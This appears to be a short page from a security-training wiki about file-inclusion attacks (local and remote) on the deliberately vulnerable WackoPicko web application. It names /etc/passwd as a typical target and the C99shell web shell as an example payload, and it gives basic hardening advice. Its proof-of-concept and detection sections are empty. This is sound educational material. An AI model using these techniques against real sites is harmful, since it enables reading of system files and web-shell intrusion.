WackoPicko/File-Inclusion
Jump to navigation
Jump to search
| You are here: | File Inclusion
|
Description
File Inclusion attacks are of two types:
- Local File Inclusion (LFI). It consists of exploiting a directory-traversal vulnerability to include files that were not intended by the application. A common target is the famous /etc/passwd file.
- Remote File Inclusion (RFI). Same as LFI but by injecting a remote file (e.g. C99shell).
Proof of Concept
Warning
Notice that NULL Byte has been disabled from PHP 5.3.4
How to detect?
How to protect against it?
- Upgrade to the latest version of PHP
- Never trust user inputs. Always challenge the strings against whitelists and purify/sanitze content.